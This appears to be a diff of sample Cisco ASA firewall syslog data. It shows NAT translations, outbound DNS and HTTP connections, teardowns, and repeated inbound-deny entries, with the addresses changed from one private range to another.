localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to 